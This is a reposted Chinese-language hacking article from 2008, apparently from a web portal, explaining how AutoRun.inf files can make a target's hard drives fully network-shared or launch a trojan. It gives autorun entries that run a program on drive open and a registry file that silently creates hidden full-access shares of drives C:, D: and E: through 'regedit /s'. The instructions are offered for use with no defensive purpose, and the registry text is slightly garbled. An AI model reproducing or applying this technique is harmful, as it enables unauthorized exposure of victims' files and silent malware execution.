详解来自Autorun的攻击
2008-04-02 11:00:06来源:互联网 阅读 ()
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法,由于AutoRun.inf文件在黑客技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。
一、理论基础
m">经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
AutoRun.inf不光能让光盘自动运行程序,也能让硬盘自动运行程序,方法很简单,先打开记事本,然后用鼠标右键点击该文件,在弹出菜单中选择“重命名”,将其改名为AutoRun.inf,在AutoRun.inf中键入以下内容:
[AutoRun] //表示AutoRun部分开始,必须输入 Icon=C:\C.ico //给C盘一个个性化的盘符图标C.ico Open=C:\1.exe //指定要运行程序的路径和名称,在此为C盘下的1.exe
shell\标志=显示的鼠标右键菜单中内容 shell\标志\command=要执行的文件或命令行
shell\1=天若有情天亦老 shell\1\command\=notepad ok.txt
REGEDIT4 '此处一定要空一行 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$] "Path"="C:" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "Parmlenc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$] "Path"="D:" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "Parmlenc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$] "Path"="E:" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "Parmlenc"=hex: "Parm2enc"=hex:
[AutoRun] Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:如何防范网络免受黑客攻击
下一篇:企业网络安全重点
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
